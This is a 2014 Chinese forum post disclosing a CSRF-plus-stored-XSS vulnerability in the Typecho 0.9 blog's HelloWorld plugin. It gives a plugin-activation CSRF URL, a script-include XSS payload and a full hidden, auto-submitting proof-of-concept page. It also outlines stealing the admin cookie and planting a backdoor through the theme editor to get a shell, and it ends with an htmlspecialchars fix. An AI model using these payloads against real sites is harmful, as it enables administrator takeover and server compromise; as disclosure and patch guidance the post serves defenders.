本帖最后由 C4r1st 于 2014-5-15 14:35 编辑
1) Vul Description
Typecho 0.9(13.12.12)是一款国内流行的PHP Blog系统,其程序内置Hello,World插件(默认关闭)存在CSRF漏洞可开启插件。
插件开启后会在菜单显示简单介绍,存在XSS漏洞,CSRF&XSS配合后可获取管理员Cookie进入后台。
2) CSRF
[AppleScript] 纯文本查看 复制代码 http://localhost/typecho/index.php/action/plugins-edit?activate=Evi1m0
3) XSS
[AppleScript] 纯文本查看 复制代码 <script src="./ff0000team.js"></script>
4) POC
[AppleScript] 纯文本查看 复制代码 <div style="display: none;">
<img src="http://localhost/typecho/index.php/action/plugins-edit?activate=HelloWorld" />
<form action="http://localhost/typecho/index.php/action/plugins-edit?config=HelloWorld" method="post" enctype="application/x-www-form-urlencoded" name="ff0000team">
<input name="word" value="<img src=@ onerror=alert(222)>">
<button type="submit"></button>
</form>
</div>
<script>
setTimeout("document.ff0000team.submit()", 3000);
</script>
5) GETSHELL
http://localhost/typecho/admin/theme-editor.php
进入后台后编辑模板写入backdoor连接,未过滤危险函数。
6) Fix
/typecho/usr/plugins/HelloWorld/Plugin.php 代码65行修改为:
[AppleScript] 纯文本查看 复制代码 echo '<span class="message success">' . htmlspecialchars(Typecho_Widget::widget('Widget_Options')->plugin('HelloWorld')->word) . '</span>';
转自邪红 | 
发表于 2014-5-15 14:32:38
发表于 2014-5-15 15:16:47
